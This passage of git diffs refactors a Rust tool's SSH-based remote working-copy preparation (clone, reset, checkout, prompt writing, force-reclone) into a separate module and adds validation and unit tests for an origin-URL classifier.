-                    work_dir.display()
-                ));
-            };
-            let url = id.clone_url();
-            let script = format!(
-                "set -e; {mkdir_parent} git clone -- {url} {escaped_work}",
-                mkdir_parent = mkdir_parent_for(work_dir),
-                url = shell_escape(&url),
-            );
-            self.run_wrapped(&script)?;
-        }
-
-        // 3. Dirty check (only meaningful if the worktree pre-existed).
-        let dirty_script = format!("cd {escaped_work}; git status --porcelain=v1");
-        let porcelain = self.run_wrapped_capture(&dirty_script)?;
-        let dirty = super::issue_git_prep::porcelain_is_dirty(&porcelain);
-
-        if dirty {
-            match policy {
-                DirtyPolicy::Stop => return Ok(PrepOutcome::Dirty),
-                DirtyPolicy::Discard => {
-                    let script = format!(
-                        "set -e; cd {escaped_work}; \
-                         git reset --hard; \
-                         git clean -fd -e {jefe} -e {jefe_glob} -e {llx} -e {llx_glob}",
-                        jefe = shell_escape(".jefe/"),
-                        jefe_glob = shell_escape(".jefe/**"),
-                        llx = shell_escape(".llxprt/"),
-                        llx_glob = shell_escape(".llxprt/**"),
-                    );
-                    self.run_wrapped(&script)?;
-                }
-            }
-        }
-
-        // 4. Resolve default branch + fetch + checkout. The checkout uses a
-        // fallback to reset --hard ONLY when the worktree is already on the
-        // desired default branch (linked worktrees cannot check out a branch
-        // already used elsewhere). If the worktree is on a different branch,
-        // reset --hard would move the wrong branch ref — so we fail with a
-        // clear error instead.
-        let script = format!(
-            "set -e; cd {escaped_work}; \
-             branch=$(git symbolic-ref refs/remotes/origin/HEAD | sed 's@^refs/remotes/origin/@@'); \
-             git fetch origin \"$branch\"; \
-             if git checkout -B \"$branch\" \"origin/$branch\" -- 2>/dev/null; then \
-                 :; \
-             elif [ \"$(git rev-parse --abbrev-ref HEAD)\" = \"$branch\" ]; then \
-                 git reset --hard \"origin/$branch\"; \
-             else \
-                 echo \"Cannot reset to origin/$branch: worktree is on a different branch\" >&2; \
-                 exit 1; \
-             fi",
-        );
-        self.run_wrapped(&script)?;
-
-        // 5. mkdir .jefe + write prompt via stdin.
-        let jefe_dir = shell_escape(&work_dir.join(".jefe").to_string_lossy());
-        let prompt_path =
-            shell_escape(&work_dir.join(ISSUE_PROMPT_RELATIVE_PATH).to_string_lossy());
-        let script = format!("set -e; mkdir -p {jefe_dir}; cat > {prompt_path}");
-        self.run_wrapped_stdin(&script, prompt.as_bytes())?;
-
-        Ok(PrepOutcome::Ready)
-    }
-
-    /// Write a prompt file to the remote host at `work_dir/{relative_path}`
-    /// via `ssh -T`, piping prompt bytes through stdin.
-    ///
-    /// This is the reusable remote write used by [`write_prompt_to_target`]
-    /// for both issue and PR prompts. It does NOT clone, check dirty, or
-    /// switch branches — it only creates `.jefe/` and writes the file.
-    fn write_prompt(
-        &self,
-        work_dir: &Path,
-        relative_path: &str,
-        prompt_bytes: &[u8],
-    ) -> Result<(), String> {
-        let jefe_dir = shell_escape(&work_dir.join(".jefe").to_string_lossy());
-        let prompt_path = shell_escape(&work_dir.join(relative_path).to_string_lossy());
-        let script = format!("set -e; mkdir -p {jefe_dir}; cat > {prompt_path}");
-        self.run_wrapped_stdin(&script, prompt_bytes)
-    }
-
-    /// Run a wrapped (effective-user) remote command requiring success.
-    fn run_wrapped(&self, script: &str) -> Result<(), String> {
-        let wrapped = wrap_effective_user(&self.remote, script);
-        self.run_remote(&wrapped)
-    }
-
-    /// Run a wrapped remote command and capture stdout.
-    fn run_wrapped_capture(&self, script: &str) -> Result<String, String> {
-        let wrapped = wrap_effective_user(&self.remote, script);
-        self.run_remote_capture(&wrapped)
-    }
-
-    /// Run a wrapped remote command with stdin bytes.
-    fn run_wrapped_stdin(&self, script: &str, stdin: &[u8]) -> Result<(), String> {
-        let wrapped = wrap_effective_user(&self.remote, script);
-        self.run_remote_stdin(&wrapped, stdin)
-    }
-
-    /// Run a remote predicate probe under the effective user and return its
-    /// boolean result.
-    ///
-    /// The condition is wrapped in the sentinel protocol via
-    /// [`wrap_predicate`]: the script always exits 0 after printing exactly
-    /// `JEFE_PREDICATE_TRUE` or `JEFE_PREDICATE_FALSE`. The result is
-    /// classified by [`classify_predicate_output`], which is **fail-closed**:
-    ///
-    /// - Exit 0 + exactly `JEFE_PREDICATE_TRUE` → `Ok(true)`.
-    /// - Exit 0 + exactly `JEFE_PREDICATE_FALSE` → `Ok(false)` (safe false).
-    /// - SSH exit 255 / auth / host / sudo / shell failure (any nonzero) /
-    ///   malformed/extra output → `Err`.
-    ///
-    /// This replaces the old blanket `nonzero = false` which conflated
-    /// infrastructure failures with a legitimate missing-path predicate.
-    fn run_remote_check(&self, condition: &str) -> Result<bool, String> {
-        let predicate = wrap_predicate(condition);
-        let wrapped = wrap_effective_user(&self.remote, &predicate);
-        let output = self.run_remote_capture_raw(&wrapped)?;
-        let stdout = String::from_utf8_lossy(&output.stdout);
-        let stderr = String::from_utf8_lossy(&output.stderr);
-        classify_predicate_output(output.status.code(), &stdout, &stderr)
-    }
-
-    /// Run a remote command requiring success.
-    fn run_remote(&self, remote_command: &str) -> Result<(), String> {
-        let output = self.run_remote_capture_raw(remote_command)?;
-        if output.status.success() {
-            Ok(())
-        } else {
-            Err(remote_failure_message(
-                &self.remote,
-                remote_command,
-                &output,
-            ))
-        }
-    }
-
-    /// Run a remote command and capture stdout as a string.
-    fn run_remote_capture(&self, remote_command: &str) -> Result<String, String> {
-        let output = self.run_remote_capture_raw(remote_command)?;
-        if output.status.success() {
-            Ok(String::from_utf8_lossy(&output.stdout).into_owned())
-        } else {
-            Err(remote_failure_message(
-                &self.remote,
-                remote_command,
-                &output,
-            ))
-        }
-    }
-
-    /// Run a remote command with prompt bytes piped via stdin.
-    fn run_remote_stdin(&self, remote_command: &str, stdin_bytes: &[u8]) -> Result<(), String> {
-        use std::io::Write;
-        let mut child = self
-            .ssh_command(remote_command)
-            .stdin(Stdio::piped())
-            .stdout(Stdio::piped())
-            .stderr(Stdio::piped())
-            .spawn()
-            .map_err(|e| format!("failed to spawn ssh: {e}"))?;
-        if let Some(mut stdin) = child.stdin.take() {
-            stdin
-                .write_all(stdin_bytes)
-                .map_err(|e| format!("failed to write prompt via stdin: {e}"))?;
-        }
-        let output = child
-            .wait_with_output()
-            .map_err(|e| format!("ssh failed: {e}"))?;
-        if output.status.success() {
-            Ok(())
-        } else {
-            Err(remote_failure_message(
-                &self.remote,
-                remote_command,
-                &output,
-            ))
-        }
-    }
-
-    /// Run a remote command capturing output (raw). Returns `Err` only on SSH
-    /// spawn failure (a transport/infrastructure error); a non-zero remote
-    /// exit status is returned as `Ok(output)` so callers can distinguish
-    /// predicate results from transport failures.
-    fn run_remote_capture_raw(&self, remote_command: &str) -> Result<std::process::Output, String> {
-        self.ssh_command(remote_command)
-            .stdout(Stdio::piped())
-            .stderr(Stdio::piped())
-            .output()
-            .map_err(|e| {
-                format!(
-                    "SSH transport failure to {}@{}: {e}",
-                    self.remote.login_user.trim(),
-                    self.remote.host.trim()
-                )
-            })
-    }
-
-    /// Build the `ssh -T` command for a remote script.
-    fn ssh_command(&self, remote_command: &str) -> Command {
-        let mut cmd = Command::new("ssh");
-        cmd.args(["-o", "BatchMode=yes", "-o", "ConnectTimeout=10", "-T", "--"]);
-        cmd.arg(format!(
-            "{}@{}",
-            self.remote.login_user.trim(),
-            self.remote.host.trim()
-        ));
-        cmd.arg(remote_command);
-        cmd
-    }
-}
-
-/// Build the `mkdir -p $(dirname work)` prefix for a clone, or empty if no
-/// parent.
-fn mkdir_parent_for(work_dir: &Path) -> String {
-    match work_dir.parent() {
-        Some(parent) if !parent.as_os_str().is_empty() => {
-            format!("mkdir -p {};", shell_escape(&parent.to_string_lossy()))
-        }
-        _ => String::new(),
-    }
-}
-
-/// Wrap a remote command in the effective-user switch (`sudo -n su - <user>
-/// -c '...'`) when `run_as_user` differs from `login_user`. Mirrors
-/// `runtime::commands::remote_tmux_command` so the effective-user behavior is
-/// consistent between prep and tmux operations.
-fn wrap_effective_user(remote: &RemoteRepositorySettings, command: &str) -> String {
-    let effective = if remote.run_as_user.trim().is_empty() {
-        remote.login_user.trim()
-    } else {
-        remote.run_as_user.trim()
-    };
-    if effective == remote.login_user.trim() {
-        command.to_owned()
-    } else {
-        format!(
-            "sudo -n su - {} -c {}",
-            shell_escape(effective),
-            shell_escape(command),
-        )
-    }
-}
-
-/// Format a remote command failure message from a captured output.
-fn remote_failure_message(
+/// **Ordering invariant (MUST-FIX #2):** the identity is required
+/// (non-optional), so the clone URL is resolved BEFORE the `rm -rf`.
+fn prepare_remote_force_reclone(
     remote: &RemoteRepositorySettings,
-    command: &str,
-    output: &std::process::Output,
-) -> String {
-    let stderr = String::from_utf8_lossy(&output.stderr).trim().to_owned();
-    let stdout = String::from_utf8_lossy(&output.stdout).trim().to_owned();
-    let detail = if !stderr.is_empty() {
-        stderr
-    } else if !stdout.is_empty() {
-        stdout
-    } else {
-        format!("exit status {}", output.status)
-    };
-    format!(
-        "remote prep on {}@{} failed ({command}): {detail}",
-        remote.login_user.trim(),
-        remote.host.trim(),
-    )
+    work_dir: &Path,
+    identity: &CloneIdentity,
+    prompt: &str,
+) -> Result<PrepOutcome, String> {
+    let runner = remote::RemotePrepRunner::new(remote.clone());
+    runner.run_force_reclone(work_dir, identity, prompt)
 }
 
-/// Shell-escape a single-quoted string (mirrors
-/// `runtime::commands::shell_escape_single`).
-fn shell_escape(value: &str) -> String {
-    format!("'{}'", value.replace('\'', r"'\''"))
-}
+#[path = "issue_prep_remote.rs"]
+mod remote;
 
 #[cfg(test)]
 #[path = "issue_prep_tests.rs"]
@@ -850,3 +375,6 @@ mod tests;
 #[cfg(test)]
 #[path = "issue_prep_predicate_tests.rs"]
 mod predicate_tests;
+
+#[cfg(test)]
+pub(super) use remote::{classify_origin_url_output, classify_predicate_output, wrap_predicate};

--- a/src/app_input/issue_prep.rs
+++ b/src/app_input/issue_prep.rs
@@ -199,10 +199,14 @@ pub(super) fn force_reclone_local_with_url(
             super::issue_git_prep::ConfirmedReclone::confirmed(),
         )?;
     }
-    // Clone from the resolved URL.
-    ensure_workdir_cloned(work_dir, Some(clone_url))?;
-    // Post-clone prep (dirty-check is Stop, but a fresh clone is clean).
+    // Any failure from here (clone or prep) occurs AFTER the original workdir
+    // has been destroyed. Annotate the error so the user understands their
+    // data is already gone and what step failed, rather than seeing a bare
+    // clone/prep error that hides the destruction.
+    ensure_workdir_cloned(work_dir, Some(clone_url))
+        .map_err(|e| format!("After removing the mismatched work_dir, the clone failed (the original working copy at {} is already gone): {e}", work_dir.display()))?;
     run_local_policy_and_prep(work_dir, DirtyPolicy::Stop, prompt)
+        .map_err(|e| format!("After force-recloning {} (the original working copy is already gone), post-clone prep failed: {e}", work_dir.display()))
 }
 
 /// Local-target prep sequence.
@@ -257,7 +261,7 @@ fn write_prompt_local(work_dir: &Path, prompt: &str) -> Result<(), String> {
 /// be relative (no leading `/`), and contain no path-traversal components
 /// (`..`). This prevents absolute-path injection and directory traversal when
 /// the path is joined with the work dir or interpolated into a remote shell.
-fn validate_prompt_relative_path(relative_path: &str) -> Result<(), String> {
+pub(super) fn validate_prompt_relative_path(relative_path: &str) -> Result<(), String> {
     if !relative_path.starts_with(".jefe/") {
         return Err(format!(
             "Prompt path {relative_path:?} must start with '.jefe/'"

--- a/src/app_input/issue_prep.rs
+++ b/src/app_input/issue_prep.rs
@@ -186,6 +186,10 @@ pub(super) fn force_reclone_local_with_url(
     clone_url: &str,
     prompt: &str,
 ) -> Result<PrepOutcome, String> {
+    // Defense-in-depth: refuse catastrophic targets (root, empty, top-level)
+    // even though the user confirmed. This guards against a misconfigured
+    // work_dir reaching `rm -rf`.
+    super::issue_git_prep::validate_reclone_target(work_dir)?;
     // Remove the mismatched workdir. The confirmation token is the
     // compile-time guarantee that the user confirmed via the modal; this
     // function is only reached from confirm_issue_origin_mismatch_enter.

--- a/src/app_input/issue_prep.rs
+++ b/src/app_input/issue_prep.rs
@@ -186,9 +186,14 @@ pub(super) fn force_reclone_local_with_url(
     clone_url: &str,
     prompt: &str,
 ) -> Result<PrepOutcome, String> {
-    // Remove the mismatched workdir.
+    // Remove the mismatched workdir. The confirmation token is the
+    // compile-time guarantee that the user confirmed via the modal; this
+    // function is only reached from confirm_issue_origin_mismatch_enter.
     if work_dir.exists() {
-        remove_workdir(work_dir)?;
+        remove_workdir(
+            work_dir,
+            super::issue_git_prep::ConfirmedReclone::confirmed(),
+        )?;
     }
     // Clone from the resolved URL.
     ensure_workdir_cloned(work_dir, Some(clone_url))?;

--- a/src/app_input/issue_prep_predicate_tests.rs
+++ b/src/app_input/issue_prep_predicate_tests.rs
@@ -253,3 +253,77 @@ fn production_seam_malformed_output_never_causes_clone() {
         "malformed output must be Err — never a safe false or true"
     );
 }
+
+// ── classify_origin_url_output: origin-probe classifier (MUST-FIX #1) ──
+//
+// `read_remote_origin_url` must distinguish three outcomes:
+// 1. Origin exists + get-url succeeds → Ok(Some(url)).
+// 2. Origin absent (get-url exits nonzero, swallowed by `|| true`) → Ok(None).
+// 3. SSH/sudo/shell failure → Err.
+//
+// These tests exercise the pure classifier with the exact scenarios the
+// production path encounters.
+
+#[test]
+fn origin_url_classifier_success_with_url() {
+    let result = classify_origin_url_output(Some(0), "git@github.com:acme/widgets.git\n", "");
+    assert_eq!(
+        result,
+        Ok(Some("git@github.com:acme/widgets.git".to_owned()))
+    );
+}
+
+#[test]
+fn origin_url_classifier_success_empty_is_no_origin() {
+    // Exit 0 + empty stdout means the `|| true` swallowed a nonzero git exit
+    // (no origin remote). This is Ok(None), NOT an error.
+    let result = classify_origin_url_output(Some(0), "", "");
+    assert_eq!(result, Ok(None));
+}
+
+#[test]
+fn origin_url_classifier_success_whitespace_only_is_no_origin() {
+    let result = classify_origin_url_output(Some(0), "  \n", "");
+    assert_eq!(result, Ok(None));
+}
+
+#[test]
+fn origin_url_classifier_ssh_exit_255_is_err() {
+    let result = classify_origin_url_output(Some(255), "", "Permission denied (publickey).");
+    let Err(err) = &result else {
+        panic!("SSH exit 255 must be Err: {result:?}");
+    };
+    assert!(
+        err.contains("255") || err.contains("transport") || err.contains("auth"),
+        "error must mention transport/auth/255: {err}"
+    );
+}
+
+#[test]
+fn origin_url_classifier_other_nonzero_is_err() {
+    let result = classify_origin_url_output(Some(126), "", "sudo: a password is required");
+    assert!(result.is_err(), "nonzero exit must be Err");
+}
+
+#[test]
+fn origin_url_classifier_signal_terminated_is_err() {
+    let result = classify_origin_url_output(None, "", "");
+    assert!(result.is_err(), "signal termination must be Err");
+}
+
+#[test]
+fn origin_url_classifier_success_trims_url() {
+    let result = classify_origin_url_output(Some(0), "  https://github.com/acme/widgets.git\n", "");
+    assert_eq!(
+        result,
+        Ok(Some("https://github.com/acme/widgets.git".to_owned()))
+    );
+}
+
+#[test]
+fn origin_url_classifier_no_origin_never_causes_error() {
+    // The critical safety property: a missing origin (Ok(None)) must NOT be
+    // an error — it must surface as OriginMismatch at the caller level.
+    let result = classify_origin_url_output(Some(0), "", "");
+    assert_eq!(result, Ok(None));
+}

--- a/src/app_input/issue_prep_predicate_tests.rs
+++ b/src/app_input/issue_prep_predicate_tests.rs
@@ -275,8 +275,11 @@ fn origin_url_classifier_success_with_url() {
 
 #[test]
 fn origin_url_classifier_success_empty_is_no_origin() {
-    // Exit 0 + empty stdout means the `|| true` swallowed a nonzero git exit
-    // (no origin remote). This is Ok(None), NOT an error.
+    // The classifier treats exit 0 + empty stdout as Ok(None). In production
+    // this state is produced by the read_remote_origin_url wrapper mapping
+    // git's exit-2 (no origin remote) to empty stdout; this test verifies the
+    // classifier's contract for that input directly, independent of how the
+    // shell produced it.
     let result = classify_origin_url_output(Some(0), "", "");
     assert_eq!(result, Ok(None));
 }
@@ -321,9 +324,12 @@ fn origin_url_classifier_success_trims_url() {
 }
 
 #[test]
-fn origin_url_classifier_no_origin_never_causes_error() {
-    // The critical safety property: a missing origin (Ok(None)) must NOT be
-    // an error — it must surface as OriginMismatch at the caller level.
-    let result = classify_origin_url_output(Some(0), "", "");
+fn origin_url_classifier_success_empty_with_stderr_is_no_origin() {
+    // The classifier keys off exit code + stdout, not stderr: exit 0 with
+    // empty stdout is Ok(None) even if stderr carries incidental text. This
+    // is a distinct edge case from the plain empty-stdout test (which has
+    // empty stderr too) and guards against a future change that keys the
+    // no-origin decision on stderr presence.
+    let result = classify_origin_url_output(Some(0), "", "warning: something");
     assert_eq!(result, Ok(None));
 }

--- a/src/app_input/issue_prep_predicate_tests.rs
+++ b/src/app_input/issue_prep_predicate_tests.rs
@@ -292,13 +292,21 @@ fn origin_url_classifier_success_whitespace_only_is_no_origin() {
 
 #[test]
 fn origin_url_classifier_ssh_exit_255_is_err() {
-    let result = classify_origin_url_output(Some(255), "", "Permission denied (publickey).");
+    let stderr = "Permission denied (publickey).";
+    let result = classify_origin_url_output(Some(255), "", stderr);
     let Err(err) = &result else {
         panic!("SSH exit 255 must be Err: {result:?}");
     };
+    // Pin the fixed message prefix exactly (the stderr detail is appended).
+    // This is robust against reformatting of the classifier's message while
+    // still verifying the exit-255 transport-failure classification.
     assert!(
-        err.contains("255") || err.contains("transport") || err.contains("auth"),
-        "error must mention transport/auth/255: {err}"
+        err.starts_with("SSH transport/auth/host failure (exit 255):"),
+        "error must use the SSH transport-failure prefix: {err}"
+    );
+    assert!(
+        err.contains(stderr),
+        "error must include the raw stderr: {err}"
     );
 }
 

--- a/src/app_input/issue_prep_remote.rs
+++ b/src/app_input/issue_prep_remote.rs
@@ -132,7 +132,7 @@ impl RemotePrepPlanner {
         }
 
         // 1. Clone if missing.
-        if inputs.presence == WorkdirPresence::Absent {
+        if *presence == WorkdirPresence::Absent {
             // Path absent → clone if identity present. If no identity is
             // available, the live runner returns Err and no further ops run;
             // mirror that here so the planner cannot emit checkout/prompt

--- a/src/app_input/issue_prep_remote.rs
+++ b/src/app_input/issue_prep_remote.rs
@@ -311,13 +311,13 @@ impl RemotePrepPlanner {
 
 /// Classify the raw output of a `git remote get-url origin` probe.
 ///
-/// Distinguishes three outcomes (issue #190 MUST-FIX #1):
+/// Distinguishes the following outcomes (issue #190 MUST-FIX #1):
 ///
-/// - Exit 0 with non-empty stdout → `Ok(Some(url))` (origin exists).
+/// - Exit 0 with non-empty stdout → `Ok(Some(raw_url))` (origin exists). The
+///   raw URL is returned unvalidated; URL parsing/host-matching is the
+///   caller's responsibility (`remote_origin_mismatch`).
 /// - Exit 0 with empty stdout → `Ok(None)` (origin absent — the probe
 ///   script swallows the nonzero git exit and prints nothing).
-/// - Exit 0 with stdout that fails to parse as a valid origin URL →
-///   `Ok(None)` (treat as absent, fail-safe for comparison).
 /// - SSH exit 255 → `Err` (transport/auth/host failure).
 /// - Any other nonzero exit → `Err` (sudo/shell/auth failure).
 /// - Signal termination (no exit code) → `Err`.

--- a/src/app_input/issue_prep_remote.rs
+++ b/src/app_input/issue_prep_remote.rs
@@ -1,0 +1,855 @@
+//! Remote SSH subsystem for target-aware working-copy preparation.
+//!
+//! Extracted from `issue_prep.rs` to keep the parent module under the
+//! 1000-line source-file limit. Contains the live `RemotePrepRunner`
+//! (noninteractive SSH execution), the test-only pure `RemotePrepPlanner`
+//! (command planning without execution), and the shared SSH helper functions.
+
+use std::path::Path;
+use std::process::{Command, Stdio};
+
+use jefe::domain::RemoteRepositorySettings;
+
+use super::super::clone_identity::CloneIdentity;
+use super::{DirtyPolicy, ISSUE_PROMPT_RELATIVE_PATH, PrepOutcome};
+
+// ──────────────────────────────────────────────────────────────────────────
+// Remote target prep
+// ──────────────────────────────────────────────────────────────────────────
+
+/// A pure planner that records the remote commands and prompt-transfer plan
+/// **without** executing them. Exposed for deterministic tests proving all
+/// operations target the remote host, use `ssh -T`, and transfer prompt bytes
+/// via stdin.
+#[cfg(test)]
+#[derive(Debug, Clone)]
+pub struct RemotePrepPlanner {
+    remote: RemoteRepositorySettings,
+}
+
+/// Whether the remote work dir is absent, present but not a git worktree, or
+/// a present git worktree. Replaces two boolean fields so `PlanInputs` stays
+/// under the `clippy::too_many_bools` threshold.
+#[cfg(test)]
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum WorkdirPresence {
+    /// The remote work dir does not exist.
+    Absent,
+    /// The remote work dir exists but is **not** a git worktree.
+    NotGit,
+    /// The remote work dir exists and is a git worktree.
+    Git,
+}
+
+/// Inputs driving the pure remote-command planner. Bundled into a struct so
+/// the planner signature stays under the project's argument-count limit
+/// (`clippy::too_many_arguments`).
+#[cfg(test)]
+#[derive(Debug, Clone)]
+pub struct PlanInputs<'a> {
+    /// Work dir the clone/checkout targets.
+    pub work_dir: &'a Path,
+    /// Validated clone identity (HTTPS URL), if any.
+    pub identity: Option<&'a CloneIdentity>,
+    /// Dirty-copy handling policy.
+    pub policy: DirtyPolicy,
+    /// Whether the remote work dir is absent, non-git, or a git worktree.
+    pub presence: WorkdirPresence,
+    /// The remote work dir is dirty (meaningful only when a git worktree).
+    pub is_dirty: bool,
+    /// The remote work dir's origin does not match the configured repository.
+    /// When true, the planner short-circuits (no checkout/pull/prompt op),
+    /// mirroring the `Dirty`+`Stop` short-circuit.
+    pub origin_mismatch: bool,
+    /// Prompt bytes to transfer via stdin.
+    pub prompt: &'a str,
+}
+
+/// A single recorded remote operation (for test verification).
+#[cfg(test)]
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub(super) struct PlannedRemoteOp {
+    /// The `ssh -T` argv (everything after the `ssh` binary).
+    pub ssh_argv: Vec<String>,
+    /// Prompt bytes sent via stdin, if this op transfers the prompt.
+    pub stdin_prompt: Option<String>,
+}
+
+#[cfg(test)]
+impl RemotePrepPlanner {
+    /// Create a planner for the given remote settings.
+    #[must_use]
+    pub(super) fn new(remote: RemoteRepositorySettings) -> Self {
+        Self { remote }
+    }
+
+    /// Plan the full remote prep sequence for the given state, returning the
+    /// ordered list of `ssh -T` operations that would be executed.
+    ///
+    /// The sequence mirrors the local prep:
+    /// 1. detect git worktree (if not, clone if identity present);
+    /// 2. dirty check;
+    /// 3. if dirty and Discard, reset+clean;
+    /// 4. resolve default branch, fetch, checkout;
+    /// 5. mkdir .jefe + write prompt via stdin.
+    ///
+    /// This is pure — it does not inspect the remote filesystem. Callers
+    /// supply `presence`, `is_dirty`, and `origin_mismatch` to drive the
+    /// branching deterministically.
+    #[must_use]
+    pub(super) fn plan(&self, inputs: &PlanInputs<'_>) -> Vec<PlannedRemoteOp> {
+        let mut ops = Vec::new();
+        let escaped_work = shell_escape(&inputs.work_dir.to_string_lossy());
+        let is_git = inputs.presence == WorkdirPresence::Git;
+        let PlanInputs {
+            work_dir,
+            identity,
+            policy,
+            presence: _,
+            is_dirty,
+            origin_mismatch,
+            prompt,
+        } = inputs;
+
+        // Origin mismatch short-circuits before any destructive op, mirroring
+        // the Dirty+Stop short-circuit. The caller opens the confirm modal.
+        if is_git && *origin_mismatch {
+            return ops;
+        }
+
+        // 1. Clone if missing.
+        if inputs.presence == WorkdirPresence::Absent {
+            // Path absent → clone if identity present.
+            if let Some(id) = identity {
+                let url = id.clone_url();
+                let script = format!(
+                    "set -e; {mkdir_parent} git clone -- {url} {escaped_work}",
+                    mkdir_parent = mkdir_parent_for(work_dir),
+                    url = shell_escape(&url),
+                );
+                ops.push(self.wrapped_ssh_op(&script, None));
+            }
+        }
+
+        // 2. Dirty check.
+        if inputs.presence != WorkdirPresence::NotGit {
+            // After clone the worktree is clean; only check dirty when it
+            // pre-existed as a git worktree.
+            if is_git && *is_dirty {
+                match policy {
+                    DirtyPolicy::Stop => {
+                        // Stop: no further ops. The caller opens the confirm
+                        // modal; no reset/clean is planned.
+                        return ops;
+                    }
+                    DirtyPolicy::Discard => {
+                        // Discard: reset --hard + clean -fd with exclusions.
+                        let script = format!(
+                            "set -e; cd {escaped_work}; \
+                             git reset --hard; \
+                             git clean -fd -e {jefe} -e {jefe_glob} -e {llx} -e {llx_glob}",
+                            jefe = shell_escape(".jefe/"),
+                            jefe_glob = shell_escape(".jefe/**"),
+                            llx = shell_escape(".llxprt/"),
+                            llx_glob = shell_escape(".llxprt/**"),
+                        );
+                        ops.push(self.wrapped_ssh_op(&script, None));
+                    }
+                }
+            }
+
+            // 4. Resolve default branch + fetch + checkout. The linked-worktree
+            // fallback resets only when the worktree is on the desired branch.
+            let script = format!(
+                "set -e; cd {escaped_work}; \
+                 branch=$(git symbolic-ref refs/remotes/origin/HEAD | sed 's@^refs/remotes/origin/@@'); \
+                 git fetch origin \"$branch\"; \
+                 if git checkout -B \"$branch\" \"origin/$branch\" -- 2>/dev/null; then \
+                     :; \
+                 elif [ \"$(git rev-parse --abbrev-ref HEAD)\" = \"$branch\" ]; then \
+                     git reset --hard \"origin/$branch\"; \
+                 else \
+                     echo \"Cannot reset to origin/$branch: worktree is on a different branch\" >&2; \
+                     exit 1; \
+                 fi",
+            );
+            ops.push(self.wrapped_ssh_op(&script, None));
+
+            // 5. mkdir .jefe + write prompt via stdin (cat > file).
+            let prompt_path = format!("{escaped_work}/{ISSUE_PROMPT_RELATIVE_PATH}");
+            let script = format!(
+                "set -e; mkdir -p {jefe_dir}; cat > {prompt_path}",
+                jefe_dir = shell_escape(&work_dir.join(".jefe").to_string_lossy()),
+                prompt_path = prompt_path,
+            );
+            ops.push(self.wrapped_ssh_op(&script, Some((*prompt).to_owned())));
+        }
+
+        ops
+    }
+
+    /// Plan the force-reclone sequence: resolve URL → rm → clone → checkout →
+    /// prompt.
+    ///
+    /// Records the ordered list of `ssh -T` operations for the force-reclone
+    /// path (issue #190 MUST-FIX #2). The identity is required (non-optional)
+    /// so the clone URL is resolved BEFORE the `rm -rf`.
+    #[must_use]
+    pub(super) fn plan_force_reclone(
+        &self,
+        work_dir: &Path,
+        identity: &CloneIdentity,
+        prompt: &str,
+    ) -> Vec<PlannedRemoteOp> {
+        let mut ops = Vec::new();
+        let escaped_work = shell_escape(&work_dir.to_string_lossy());
+
+        // 1. Resolve the clone URL BEFORE any destructive action.
+        let url = identity.clone_url();
+
+        // 2. Remove the mismatched workdir.
+        let rm_script = format!("rm -rf {escaped_work}");
+        ops.push(self.wrapped_ssh_op(&rm_script, None));
+
+        // 3. Clone from the resolved URL.
+        let clone_script = format!(
+            "set -e; {mkdir_parent} git clone -- {url} {escaped_work}",
+            mkdir_parent = mkdir_parent_for(work_dir),
+            url = shell_escape(&url),
+        );
+        ops.push(self.wrapped_ssh_op(&clone_script, None));
+
+        // 4. Post-clone prep: resolve default branch + fetch + checkout.
+        let checkout_script = format!(
+            "set -e; cd {escaped_work}; \
+             branch=$(git symbolic-ref refs/remotes/origin/HEAD | sed 's@^refs/remotes/origin/@@'); \
+             git fetch origin \"$branch\"; \
+             if git checkout -B \"$branch\" \"origin/$branch\" -- 2>/dev/null; then \
+                 :; \
+             elif [ \"$(git rev-parse --abbrev-ref HEAD)\" = \"$branch\" ]; then \
+                 git reset --hard \"origin/$branch\"; \
+             else \
+                 echo \"Cannot reset to origin/$branch: worktree is on a different branch\" >&2; \
+                 exit 1; \
+             fi",
+        );
+        ops.push(self.wrapped_ssh_op(&checkout_script, None));
+        // 5. mkdir .jefe + write prompt via stdin.
+        let jefe_dir = shell_escape(&work_dir.join(".jefe").to_string_lossy());
+        let prompt_path =
+            shell_escape(&work_dir.join(ISSUE_PROMPT_RELATIVE_PATH).to_string_lossy());
+        let prompt_script = format!("set -e; mkdir -p {jefe_dir}; cat > {prompt_path}");
+        ops.push(self.wrapped_ssh_op(&prompt_script, Some(prompt.to_owned())));
+
+        ops
+    }
+
+    /// Build a single planned `ssh -T` operation.
+    fn ssh_op(&self, remote_command: &str, stdin_prompt: Option<String>) -> PlannedRemoteOp {
+        let ssh_argv = self.ssh_argv(remote_command);
+        PlannedRemoteOp {
+            ssh_argv,
+            stdin_prompt,
+        }
+    }
+
+    /// Build a planned op from an unwrapped script, applying the effective-user
+    /// wrapper first (binds the owned String so the borrow is valid).
+    fn wrapped_ssh_op(&self, script: &str, stdin_prompt: Option<String>) -> PlannedRemoteOp {
+        let wrapped = wrap_effective_user(&self.remote, script);
+        self.ssh_op(&wrapped, stdin_prompt)
+    }
+
+    /// Build the `ssh -T` argv for a remote command.
+    fn ssh_argv(&self, remote_command: &str) -> Vec<String> {
+        vec![
+            "-o".to_owned(),
+            "BatchMode=yes".to_owned(),
+            "-o".to_owned(),
+            "ConnectTimeout=10".to_owned(),
+            // -T: disable PTY allocation for noninteractive prep/file
+            // transfer. This is distinct from the -tt used for tmux
+            // operations in runtime::commands.
+            "-T".to_owned(),
+            // `--` ends option parsing (defense in depth; identity
+            // validation is the primary guard).
+            "--".to_owned(),
+            format!(
+                "{}@{}",
+                self.remote.login_user.trim(),
+                self.remote.host.trim()
+            ),
+            remote_command.to_owned(),
+        ]
+    }
+}
+
+/// Classify the raw output of a `git remote get-url origin` probe.
+///
+/// Distinguishes three outcomes (issue #190 MUST-FIX #1):
+///
+/// - Exit 0 with non-empty stdout → `Ok(Some(url))` (origin exists).
+/// - Exit 0 with empty stdout → `Ok(None)` (origin absent — the probe
+///   script swallows the nonzero git exit and prints nothing).
+/// - Exit 0 with stdout that fails to parse as a valid origin URL →
+///   `Ok(None)` (treat as absent, fail-safe for comparison).
+/// - SSH exit 255 → `Err` (transport/auth/host failure).
+/// - Any other nonzero exit → `Err` (sudo/shell/auth failure).
+/// - Signal termination (no exit code) → `Err`.
+///
+/// This is **fail-closed**: genuine infrastructure failures propagate as
+/// `Err`, while a legitimate missing-origin remote is `Ok(None)` so the
+/// caller can return `OriginMismatch` (a git repo with no `origin` while an
+/// expected shortform IS configured is a mismatch — see
+/// [`super::remote_origin_mismatch`]).
+pub fn classify_origin_url_output(
+    exit_code: Option<i32>,
+    stdout: &str,
+    stderr: &str,
+) -> Result<Option<String>, String> {
+    match exit_code {
